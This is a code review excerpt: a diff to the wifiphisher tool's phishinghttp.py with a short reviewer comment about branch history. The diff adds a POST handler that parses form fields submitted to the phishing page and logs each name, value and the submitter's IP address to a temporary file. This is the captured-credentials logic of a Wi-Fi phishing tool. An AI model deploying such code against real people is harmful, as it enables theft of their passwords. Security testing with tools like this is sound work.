wifiphisher/common/phishinghttp.py

```diff
@@ -36,38 +48,30 @@ def get(self, url):
         except:
             pass
 
-
-class ReceiveCredsHandler(tornado.web.RequestHandler):
-
-    def post(self):
-        self.redirect("/loading")
-        wifi_webserver_tmp = "/tmp/wifiphisher-webserver.tmp"
-        with open(wifi_webserver_tmp, "a+") as log_file:
-            log_file.write('[' + T + '*' + W + '] ' + O + "POST " +
-                           T + self.request.remote_ip + " " +
-                           R + repr(self.request.body) +
-                           W + "\n"
-                           )
-            log_file.close()
+    def post(self, url):
+        formData = self.request.body.split('&')
+        formValues = []
+        for i in formData:
+            formValues.append(i.split('='))
+        for inputName,inputValue in formValues:
+            with open("/tmp/wifiphisher-webserver.tmp", "a+") as log_file:
+                log_file.write('[' + T + '*' + W + '] ' + O + "POST" + W + " request from " + T + 
+                               self.request.remote_ip + W + " input[" + G + inputName + W + 
+                               "] = " + R + inputValue + W + 
+                               "\n")
+                log_file.close()
```

Comment:
I didn't change this, not sure if this branch includes the latest commits, or did you only just notice this?